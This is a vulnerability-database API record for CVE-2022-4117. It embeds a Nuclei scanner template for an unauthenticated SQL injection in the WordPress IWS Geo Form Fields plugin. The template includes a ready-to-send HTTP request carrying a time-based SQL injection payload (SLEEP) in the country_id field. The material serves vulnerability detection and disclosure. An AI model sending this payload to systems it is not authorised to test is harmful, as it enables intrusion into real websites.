{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2022-4117/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2022-4117/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2022-4117/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2022-4117/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2022-4117/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2022-4117"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2022-4117"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2022/CVE-2022-4117.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2022-4117\n\ninfo:\n  name: WordPress IWS Geo Form Fields <=1.0 - SQL Injection\n  author: theamanrawat\n  severity: critical\n  description: |\n    WordPress IWS Geo Form Fields plugin through 1.0 contains a SQL injection vulnerability. The plugin does not properly escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the affected WordPress site.\n  remediation: |\n    Update to the latest version of the WordPress IWS Geo Form Fields plugin (>=1.1) or apply the vendor-supplied patch to mitigate the SQL Injection vulnerability.\n  reference:\n    - https://wpscan.com/vulnerability/1fac3eb4-13c0-442d-b27c-7b7736208193\n    - https://wordpress.org/plugins/iws-geo-form-fields/\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-4117\n    - https://github.com/ARPSyndicate/cvemon\n    - https://github.com/cyllective/CVEs\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-4117\n    cwe-id: CWE-89\n    epss-score: 0.04955\n    epss-percentile: 0.91847\n    cpe: cpe:2.3:a:iws-geo-form-fields_project:iws-geo-form-fields:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: iws-geo-form-fields_project\n    product: iws-geo-form-fields\n    framework: wordpress\n  tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,iws-geo-form-fields,wpscan,iws-geo-form-fields_project,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        @timeout: 15s\n        POST /wp-admin/admin-ajax.php?action=iws_gff_fetch_states HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        country_id=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(6)))b)\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration>=6'\n          - 'status_code == 200'\n          - 'contains(body, \"\\\"status\\\":200\") && contains(body, \"{\\\"html\\\":\")'\n        condition: and\n# digest: 4a0a0047304502206a9b3a10c53ff398d09a964c33c06682cbf5549757dd74f0e333234883fa25ee022100f267fbf655ea06a7cda49039768e05bbee3a8436e80c6aaf4853ee0f002cdf51:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2022-4117"
}